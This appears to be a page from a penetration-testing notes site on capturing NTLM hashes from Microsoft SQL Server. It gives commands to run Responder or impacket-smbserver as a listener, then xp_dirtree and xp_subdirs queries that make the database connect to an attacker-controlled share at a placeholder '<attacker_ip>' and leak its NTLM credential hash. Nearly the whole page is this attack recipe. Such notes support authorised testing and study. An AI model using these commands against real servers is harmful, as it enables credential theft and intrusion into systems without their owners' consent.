search
LinkedInGithub
githubEdit

capture-ntlm-hash

First we need to start RESPONDER or IMPACKET-SMBSERVER and execute one of the queries:

hashtag
Hash stealing with responder

sudo responder -I tun0

hashtag
Hash stealing with impacket

sudo impacket-smbserver share . -smb2support

hashtag
Queries:

XP_dirtree hash stealing

EXEC master..xp_dirtree '\\<attacker_ip>\<responder_share\'

XP-subdirs hash stealing

EXEC master..xp_subdirs '\\<attacker_ip>\<responder_share\'
PreviousmssqlNextconnect-to-mssql

Last updated